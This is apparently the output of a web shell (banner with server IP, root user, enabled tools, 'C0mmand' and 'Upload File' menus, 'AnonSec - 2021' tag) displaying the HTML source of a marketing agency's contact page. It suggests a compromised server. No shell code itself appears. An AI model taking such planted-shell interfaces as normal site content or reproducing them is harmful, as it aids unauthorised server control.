|
Server IP : 149.13.87.7 / Your IP : 185.174.145.2 Web Server : nginx System : Linux h2 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : root ( 0) PHP Version : 8.0.28 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /mnt/platforms/workspaces/shortable.org/../able-sp.com/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Contact Able-sp</title>
<script src="https://cdn.tailwindcss.com"></script>
<link href="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.css" rel="stylesheet" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700;800;900&family=Plus+Jakarta+Sans:wght@300;400;500;600;700;800;900&display=swap" rel="stylesheet">
<style>
body {
font-family: 'Inter', sans-serif;
padding-top: 80px;
}
h1, h2, h3, h4, h5, h6 {
font-family: 'Plus Jakarta Sans', sans-serif;
}
.contact-hero {
background: linear-gradient(135deg, rgba(15,23,42,0.85), rgba(30,64,175,0.85)), url('https://images.unsplash.com/photo-5fNmWej4tAA?w=1200&h=800&fit=crop&auto=format&q=80') center/cover;
}
</style>
<link rel="stylesheet" href="assets/css/dynamic.css">
</head>
<body class="antialiased bg-gray-50">
<nav class="fixed w-full z-50 top-0 bg-white border-b border-gray-200">
<div class="max-w-screen-xl flex flex-wrap items-center justify-between mx-auto px-6 py-2">
<a href="./" class="flex items-center space-x-3">
<div class="w-14 h-14 bg-gradient-to-br from-amber-500 to-yellow-600 rounded-2xl flex items-center justify-center shadow-lg">
<span class="text-white font-bold text-2xl">A</span>
</div>
<span class="self-center text-2xl font-black text-gray-900">
Able-sp </span>
</a>
<button data-collapse-toggle="navbar-default" type="button" class="inline-flex items-center p-2 w-10 h-10 justify-center text-sm text-gray-500 rounded-lg md:hidden hover:bg-gray-100">
<svg class="w-5 h-5" fill="none" viewBox="0 0 17 14">
<path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M1 1h15M1 7h15M1 13h15"/>
</svg>
</button>
<div class="hidden w-full md:block md:w-auto" id="navbar-default">
<ul class="font-bold flex flex-col md:flex-row md:space-x-10 items-center">
<li><a href="#services" class="block py-2 text-gray-700 hover:text-amber-600 transition-colors">Services</a></li>
<li><a href="#features" class="block py-2 text-gray-700 hover:text-amber-600 transition-colors">Features</a></li>
<li><a href="#about" class="block py-2 text-gray-700 hover:text-amber-600 transition-colors">About</a></li>
<li><a href="#testimonials" class="block py-2 text-gray-700 hover:text-amber-600 transition-colors">Testimonials</a></li>
<li><a href="blog/" class="block py-2 text-gray-700 hover:text-amber-600 transition-colors">Blog</a></li>
<li>
<a href="#contact" class="block py-3 px-8 text-white bg-gradient-to-r from-amber-600 to-yellow-600 rounded-full hover:shadow-lg transition-all">
Contact
</a>
</li>
</ul>
</div>
</div>
</nav>
<section class="py-24 bg-gradient-to-b from-white to-gray-100">
<div class="max-w-5xl mx-auto px-6 text-center space-y-6">
<span class="inline-block px-4 py-1 bg-white rounded-full border border-gray-200 text-xs uppercase tracking-[0.3em] text-gray-500">Calm, clear communication</span>
<h1 class="text-4xl md:text-5xl font-semibold text-gray-900">Share your vision with Able-sp</h1>
<p class="text-lg text-gray-600 max-w-3xl mx-auto">We align creative, strategy, and delivery teams so every touchpoint feels seamless.</p>
<div class="flex items-center justify-center space-x-3 text-sm text-gray-500">
<i class="fas fa-sparkles text-amber-500"></i>
<span>Human support</span>
</div>
</div>
</section>
<section class="bg-white py-20">
<div class="max-w-6xl mx-auto px-6 lg:px-12">
<div class="grid md:grid-cols-3 gap-10">
<div class="p-6 rounded-3xl border border-gray-100 shadow-sm">
<h3 class="text-xl font-semibold text-gray-900 mb-3">Discovery workshop</h3>
<p class="text-gray-600">Define goals, audiences, and constraints in a guided 60-minute session.</p>
</div>
<div class="p-6 rounded-3xl border border-gray-100 shadow-sm">
<h3 class="text-xl font-semibold text-gray-900 mb-3">Experience maps</h3>
<p class="text-gray-600">We translate your workflows into service blueprints and prototypes.</p>
</div>
<div class="p-6 rounded-3xl border border-gray-100 shadow-sm">
<h3 class="text-xl font-semibold text-gray-900 mb-3">Launch stewardship</h3>
<p class="text-gray-600">Our team stays with you post-launch to monitor performance and iterate.</p>
</div>
</div>
</div>
</section>
<section class="bg-gray-900 text-white py-20">
<div class="max-w-4xl mx-auto px-6 text-center space-y-6">
<p class="text-2xl leading-relaxed">They behave like an in-house team—calm, prepared, and proactive.</p>
<p class="text-sm uppercase tracking-widest text-white/60">Client feedback, Q3 Pulse</p>
</div>
</section>
<section class="bg-gray-50 py-16">
<div class="max-w-5xl mx-auto px-6">
<section class="relative bg-gradient-to-br from-amber-600 via-yellow-600 to-orange-600 py-20 overflow-hidden" id="contact">
<div class="absolute inset-0 opacity-10">
<div class="absolute top-0 right-0 w-96 h-96 bg-white rounded-full filter blur-3xl"></div>
<div class="absolute bottom-0 left-0 w-96 h-96 bg-white rounded-full filter blur-3xl"></div>
</div>
<div class="max-w-screen-lg mx-auto px-4 relative z-10">
<div class="text-center mb-12">
<h2 class="text-4xl md:text-5xl font-extrabold text-white mb-4"></h2>
<p class="text-xl text-white/90">We're here to help. Reach out to us today!</p>
</div>
<div class="bg-white rounded-3xl shadow-2xl p-8 md:p-12">
<form action="#" class="space-y-6">
<div class="grid md:grid-cols-2 gap-6">
<div>
<label for="name" class="block mb-2 text-sm font-bold text-gray-900">Your Name *</label>
<input type="text" id="name" class="bg-gray-50 border-2 border-gray-200 text-gray-900 rounded-xl focus:ring-2 focus:ring-amber-500 focus:border-transparent block w-full p-4" placeholder="Enter your name" required>
</div>
<div>
<label for="email" class="block mb-2 text-sm font-bold text-gray-900">Email Address *</label>
<input type="email" id="email" class="bg-gray-50 border-2 border-gray-200 text-gray-900 rounded-xl focus:ring-2 focus:ring-amber-500 focus:border-transparent block w-full p-4" placeholder="your@email.com" required>
</div>
</div>
<div class="grid md:grid-cols-2 gap-6">
<div>
<label for="phone" class="block mb-2 text-sm font-bold text-gray-900">Phone Number</label>
<input type="tel" id="phone" class="bg-gray-50 border-2 border-gray-200 text-gray-900 rounded-xl focus:ring-2 focus:ring-amber-500 focus:border-transparent block w-full p-4" placeholder="+1 (555) 000-0000">
</div>
<div>
<label for="company" class="block mb-2 text-sm font-bold text-gray-900">Company</label>
<input type="text" id="company" class="bg-gray-50 border-2 border-gray-200 text-gray-900 rounded-xl focus:ring-2 focus:ring-amber-500 focus:border-transparent block w-full p-4" placeholder="Your company">
</div>
</div>
<div>
<label for="message" class="block mb-2 text-sm font-bold text-gray-900">How can we help? *</label>
<textarea id="message" rows="5" class="bg-gray-50 border-2 border-gray-200 text-gray-900 rounded-xl focus:ring-2 focus:ring-amber-500 focus:border-transparent block w-full p-4" placeholder="Tell us about your project or question..." required></textarea>
</div>
<div class="flex items-center">
<input id="privacy" type="checkbox" class="w-5 h-5 text-amber-600 bg-gray-100 border-gray-300 rounded focus:ring-amber-500" required>
<label for="privacy" class="ml-3 text-sm text-gray-600">
I agree to the <a href="#" class="text-amber-600 hover:underline font-semibold">Privacy Policy</a> and <a href="#" class="text-amber-600 hover:underline font-semibold">Terms of Service</a>
</label>
</div>
<button type="submit" class="w-full py-5 text-lg font-bold text-white bg-gradient-to-r from-amber-600 to-yellow-600 rounded-xl hover:shadow-2xl hover:scale-105 transition-all">
<i class="fas fa-paper-plane mr-2"></i>
Send Your Message
</button>
</form>
</div>
<div class="grid md:grid-cols-3 gap-6 mt-12">
<div class="bg-white/10 backdrop-blur-sm rounded-2xl p-6 text-center text-white">
<i class="fas fa-phone text-3xl mb-3"></i>
<h4 class="font-bold mb-2">Call Us</h4>
<p class="text-white/80 text-sm">+1-562-832-4288</p>
</div>
<div class="bg-white/10 backdrop-blur-sm rounded-2xl p-6 text-center text-white">
<i class="fas fa-envelope text-3xl mb-3"></i>
<h4 class="font-bold mb-2">Email Us</h4>
<p class="text-white/80 text-sm">hello@able-sp.com</p>
</div>
<div class="bg-white/10 backdrop-blur-sm rounded-2xl p-6 text-center text-white">
<i class="fas fa-map-marker-alt text-3xl mb-3"></i>
<h4 class="font-bold mb-2">Visit Us</h4>
<p class="text-white/80 text-sm">783 Cherry Street, Charlotte, NC 28202</p>
</div>
</div>
</div>
</section>
</div>
</section>
<footer class="bg-gray-900 text-white">
<div class="max-w-screen-xl mx-auto px-6 py-16">
<div class="grid md:grid-cols-4 gap-10">
<div class="md:col-span-2 space-y-6">
<a href="./" class="inline-flex items-center space-x-3">
<div class="w-12 h-12 rounded-2xl bg-gradient-to-br from-amber-500 to-yellow-600 flex items-center justify-center text-white text-xl font-black">
Ab </div>
<span class="text-3xl font-black">Able-sp</span>
</a>
<p class="text-gray-400 max-w-lg">Transforming marketing brands with data-driven experiences and premium digital craftsmanship.</p>
<div class="flex items-center space-x-4 text-sm text-gray-400">
<span class="flex items-center space-x-2">
<i class="fas fa-phone text-emerald-400"></i><span>+1-562-832-4288</span>
</span>
<span class="flex items-center space-x-2">
<i class="fas fa-envelope text-emerald-400"></i><span>hello@able-sp.com</span>
</span>
</div>
</div>
<div>
<h3 class="text-lg font-bold mb-4">Navigation</h3>
<ul class="space-y-3 text-gray-400">
<li><a href="#services" class="hover:text-white transition">Services</a></li>
<li><a href="#features" class="hover:text-white transition">Platform</a></li>
<li><a href="#about" class="hover:text-white transition">Company</a></li>
<li><a href="blog/" class="hover:text-white transition">Blog</a></li>
<li><a href="#testimonials" class="hover:text-white transition">Clients</a></li>
</ul>
</div>
<div>
<h3 class="text-lg font-bold mb-4">Stay Updated</h3>
<form class="space-y-4">
<div class="relative">
<input type="email" placeholder="Your email" class="w-full px-4 py-3 rounded-xl bg-white/10 border border-white/10 text-white placeholder-white/40 focus:ring-2 focus:ring-amber-500 focus:border-transparent">
<button type="submit" class="absolute top-1/2 right-2 -translate-y-1/2 px-4 py-2 bg-white text-gray-900 font-semibold rounded-lg">Join</button>
</div>
<p class="text-xs text-gray-500">By subscribing you agree to our privacy policy.</p>
</form>
</div>
</div>
<div class="border-t border-white/10 mt-12 pt-8 flex flex-col md:flex-row md:items-center md:justify-between text-sm text-gray-500">
<span>© 2026 Able-sp. All rights reserved.</span>
<div class="flex space-x-6 mt-4 md:mt-0">
<a href="./privacy.php" class="hover:text-white transition">Privacy</a>
<a href="./terms.php" class="hover:text-white transition">Terms</a>
<a href="./disclaimer.php" class="hover:text-white transition">Disclaimer</a>
</div>
</div>
</div>
</footer>
<script src="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.js"></script>
</body>
</html>
AnonSec - 2021